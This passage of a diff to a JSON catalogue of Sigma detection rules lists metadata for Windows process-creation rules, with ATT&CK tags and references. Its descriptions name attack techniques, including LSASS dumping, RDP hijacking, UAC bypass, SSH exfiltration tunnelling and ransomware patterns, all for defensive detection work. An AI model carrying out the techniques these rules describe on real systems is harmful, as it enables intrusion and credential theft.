] - }, - "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "value": "Suspicious Execution of SharpView Aka PowerView" - }, - { - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", - "value": "Suspicious Usage Of ShellExec_RunDLL" - }, - { - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Florian Roth", - "creation_date": "2021/12/17", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "value": "Suspicious Shells Spawned by Java" - }, - { - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/12/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "value": "Suspicious Shells Spawn by Java Utility Keytool" - }, - { - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "meta": { - "author": "FPT.EagleEye Team, wagga", - "creation_date": "2020/12/11", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" - ], - "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "value": "Suspicious Shells Spawn by SQL Server" - }, - { - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Markus Neis", - "creation_date": "2021/05/20", - "falsepositive": [ - "Legitimate WinRM usage" - ], - "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", - "value": "Suspicious Processes Spawned by WinRM" - }, - { - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shimcache_flush.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "b0524451-19af-4efa-a46f-562a977f792e", - "value": "ShimCache Flush" - }, - { - "description": "Use of the commandline to shutdown or reboot windows", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_shutdown.yml", + "filename": "proc_creation_win_susp_logoff.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, - "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "value": "Suspicious Execution of Shutdown" + "uuid": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "value": "Suspicious Execution of Shutdown to Log Out" }, { - "description": "Detects suspicious Splwow64.exe process without any command line parameters", + "description": "Detects when verclsid.exe is used to run COM object via GUID", "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/23", + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_splwow64.yml", - "level": "high", + "filename": "proc_creation_win_verclsid_runs_com.yml", + "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1218" ] }, - "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "value": "Suspicious Splwow64 Without Params" + "uuid": "d06be4b9-8045-428b-a567-740a26d9db25", + "value": "Verclsid.exe Runs COM Object" }, { - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", "meta": { - "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", - "creation_date": "2021/07/11", + "author": "frack113", + "creation_date": "2022/12/11", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", + "filename": "proc_creation_win_create_link_osk_cmd.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md", + "https://ss64.com/nt/mklink.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_create_link_osk_cmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1546.008" + ] + }, + "uuid": "e9b61244-893f-427c-b287-3e708f321c6b", + "value": "Potential Privilege Escalation Using Symlink Between Osk and Cmd" + }, + { + "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/16", + "falsepositive": [ + "High" + ], + "filename": "proc_creation_win_susp_cmd_http_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100", + "https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_http_appdata.yml" ], "tags": [ "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" + "attack.t1059.003", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "value": "Suspicious Spool Service Child Process" + "uuid": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "value": "Command Line Execution with Suspicious URL and AppData Strings" }, { "description": "Detects Possible Squirrel Packages Manager as Lolbin", @@ -54429,500 +43668,100 @@ "value": "Squirrel Lolbin" }, { - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/12", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "filename": "proc_creation_win_susp_ssh_port_forward.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "value": "Suspicious SSH Port Forwarding" - }, - { - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/12", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_ssh_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "value": "Suspicious SSH Usage RDP Tunneling" - }, - { - "description": "Detects a suspicious svchost process start", + "description": "Detects DarkSide Ransomware and helpers", "meta": { "author": "Florian Roth", - "creation_date": "2017/08/15", + "creation_date": "2021/05/14", "falsepositive": [ - "Unknown" + "Unknown", + "UAC bypass method used by other malware" ], - "filename": "proc_creation_win_susp_svchost.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ] - }, - "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "value": "Suspicious Svchost Process" - }, - { - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "meta": { - "author": "David Burkett", - "creation_date": "2019/12/28", - "falsepositive": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" - ], - "filename": "proc_creation_win_susp_svchost_no_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", - "value": "Suspect Svchost Activity" - }, - { - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_sysprep_appdata.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "value": "Sysprep on AppData Folder" - }, - { - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_systeminfo.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ] - }, - "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "value": "Suspicious Execution of Systeminfo" - }, - { - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "meta": { - "author": "Florian Roth (rule), David ANDRE (additional keywords)", - "creation_date": "2021/12/20", - "falsepositive": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" - ], - "tags": "No established tags" - }, - "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "value": "Suspicious SYSTEM User Process Creation" - }, - { - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "meta": { - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/04/09", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_sysvol_access.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2288", - "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ] - }, - "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "value": "Suspicious SYSVOL Domain Group Policy Access" - }, - { - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", - "meta": { - "author": "frack113", - "creation_date": "2022/01/30", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "filename": "proc_creation_win_susp_takeown.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ] - }, - "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", - "value": "Suspicious Recursive Takeown" - }, - { - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_target_location_shell32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.group-ib.com/resources/threat-research/red-curl-2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" - ] - }, - "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", - "value": "Shell32 DLL Execution in Suspicious Directory" - }, - { - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_taskkill.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ] - }, - "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", - "value": "Suspicious Execution of Taskkill" - }, - { - "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "meta": { - "author": "frack113", - "creation_date": "2021/12/11", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "filename": "proc_creation_win_susp_tasklist_command.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ] - }, - "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", - "value": "Suspicious Tasklist Discovery Command" - }, - { - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", - "value": "Taskmgr as LOCAL_SYSTEM" - }, - { - "description": "Detects the creation of a process from Windows task manager", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_taskmgr_parent.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", - "value": "Taskmgr as Parent" - }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tracker_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe" - }, - { - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/10", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.youtube.com/watch?v=Ie831jF0bb0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "value": "Process Access via TrolleyExpress Exclusion" - }, - { - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tscon_localsystem.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "9847f263-4a81-424f-970c-875dab15b79b", - "value": "Suspicious TSCON Start as SYSTEM" - }, - { - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/17", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" - ] - }, - "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", - "value": "Suspicious RDP Redirect Using TSCON" - }, - { - "description": "Detects indicators of a UAC bypass method by mocking directories", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/08/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "filename": "proc_creation_win_mal_darkside_ransomware.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", - "https://github.com/netero1010/TrustedPath-UACBypass-BOF", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", + "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.execution", + "attack.t1204" ] }, - "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", - "value": "TrustedPath UAC Bypass Pattern" + "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "value": "DarkSide Ransomware Pattern" }, { - "description": "Detects a suspicious child process of userinit", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", "meta": { - "author": "Florian Roth (rule), Samir Bousseaden (idea)", - "creation_date": "2019/06/17", + "author": "Max Altgelt", + "creation_date": "2022/04/06", "falsepositive": [ - "Administrative scripts" + "Unlikely" ], - "filename": "proc_creation_win_susp_userinit_child.yml", + "filename": "proc_creation_win_powershell_public_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/evolution-of-fin7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" + ], + "tags": "No established tags" + }, + "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "value": "Execution of Powershell Script in Public Folder" + }, + { + "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1139811587760562176", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "37e8d358-6408-4853-82f4-98333fca7014", + "value": "Execution of NetSupport RAT From Unusual Location" + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1218", + "attack.execution" ] }, - "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", - "value": "Suspicious Userinit Child Process" + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina" }, { "description": "Detects the execution of CSharp interactive console by PowerShell", @@ -54949,718 +43788,398 @@ "value": "Suspicious Use of CSharp Interactive Console" }, { - "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", "meta": { - "author": "Agro (@agro_sev) oscd.community", - "creation_date": "2020/10/10", + "author": "Markus Neis, Sander Wiebing", + "creation_date": "2019/01/29", "falsepositive": [ - "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + "Legitimate administration" ], - "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "filename": "proc_creation_win_netsh_fw_add.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", - "https://twitter.com/bryon_/status/975835709587075072", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml" 